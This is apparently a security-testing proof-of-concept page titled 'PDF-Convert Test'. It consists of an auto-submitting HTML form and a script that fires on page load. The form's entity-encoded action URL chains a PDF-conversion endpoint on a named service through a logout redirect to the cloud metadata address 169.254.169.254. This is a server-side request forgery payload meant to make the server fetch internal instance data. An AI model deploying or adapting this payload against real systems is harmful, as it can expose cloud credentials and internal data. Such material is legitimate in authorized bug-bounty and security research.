<html><head><title>PDF-Convert Test</title>
<style type="text/css">
body { background: #dedede; font-family: Arial, sans-serif; color: #404042; -webkit-font-smoothing: antialiased; }
#container { padding: 0 15px; margin: 10px auto; background-color: #ffffff; }
a { word-wrap: break-word; }
a:link, a:visited { color: #e06228; text-decoration: none; }
a:hover, a:active { color: #404042; text-decoration: underline; }
h1 { font-size: 1.6em; line-height: 1.2em; font-weight: normal; color: #404042; }
h2 { font-size: 1.3em; line-height: 1.2em; padding: 0; margin: 0.8em 0 0.3em 0; font-weight: normal; color: #404042;}
.title, .navbar { color: #ffffff; background: #e06228; padding: 10px 15px; margin: 0 -15px 10px -15px; overflow: hidden; }
.title h1 { color: #ffffff; padding: 0; margin: 0; font-size: 1.8em; }
div.navbar {position: absolute; top: 18px; right: 25px;}
div.navbar ul {list-style-type: none; margin: 0; padding: 0;}
div.navbar li {display: inline; margin-left: 20px;}
div.navbar a {color: white; padding: 10px}
div.navbar a:hover, div.navbar a:active {text-decoration: none; background: #404042;}
</style>
</head>
<body>
<div id="container">
<div class="title"><h1>PDF-Convert Test</h1></div>
<h1>Show response</h1><p>If you are not redirected shortly, please click the button below:</p><br/><form method="POST" action="https&#58;&#47;&#47;pdf&#45;convert&#46;bitwarden&#46;com&#47;get&#45;dynamic&#45;pdf&#63;path&#61;&#64;support&#46;bitwarden&#46;com&#47;freshid&#47;logout&#47;&#63;redirect&#95;uri&#61;http&#58;&#47;&#47;169&#46;254&#46;169&#46;254&#47;v1&#46;json">
<input type="submit" name="ViewResponse" value="Show&#32;response"> 
<input type="hidden" name="RenderableItem" value="&#47;show&#47;5&#47;nfd2qqwwal39zd6efn57aj1h5hk0kzyc"> 
</form>
<br/><script>history.pushState('', '', '/'); document.forms[0].submit();</script><p>&nbsp;</p>
</div>
</body>
</html>
